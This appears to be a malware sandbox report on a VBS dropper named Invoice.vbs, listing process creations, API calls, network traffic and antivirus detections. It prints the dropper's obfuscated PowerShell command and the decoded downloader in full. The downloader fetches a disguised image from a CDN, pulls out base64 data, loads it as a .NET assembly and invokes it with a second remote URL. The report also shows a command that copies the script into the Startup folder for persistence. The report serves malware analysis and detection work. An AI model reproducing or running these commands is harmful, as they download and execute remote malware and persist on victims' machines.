command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002e8
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2524
thread_handle: 0x0000044c
process_identifier: 2520
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://cdn.pixelbin.io/v2/red-wildflower-1b0af4/original/universo_vbs.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.fcv1/B/zn.gnidliubdrayniw//:sptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
ESET-NOD32 PowerShell/TrojanDownloader.Agent.HDA
Kaspersky HEUR:Trojan.Script.Generic
DrWeb Trojan.DownLoader45.63767
Ikarus Trojan.VBS.Agent
Avira VBS/YAV.Minerva.xxlia
Google Detected
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data sent rndɨí¶<ׁ¥Lwú쯁*bˆînþŽ9fÍÏ6R/5 ÀÀÀ À 28-ÿcdn.pixelbin.io  
Data sent rndɨí¦ÖêpŽh4æí‘,RíÜH2E¾Ô:ˆ’ü/5 ÀÀÀ À 28-ÿcdn.pixelbin.io  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
cmdline ping 127.0.0.1 -n 5
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
Time & API Arguments Status Return Repeated

send

buffer: rndɨí¶<ׁ¥Lwú쯁*bˆînþŽ9fÍÏ6R/5 ÀÀÀ À 28-ÿcdn.pixelbin.io  
socket: 1444
sent: 119
1 119 0

send

buffer: rndɨí¦ÖêpŽh4æí‘,RíÜH2E¾Ô:ˆ’ü/5 ÀÀÀ À 28-ÿcdn.pixelbin.io  
socket: 1444
sent: 119
1 119 0
parent_process wscript.exe martian_process cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
parent_process wscript.exe martian_process powershell -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy 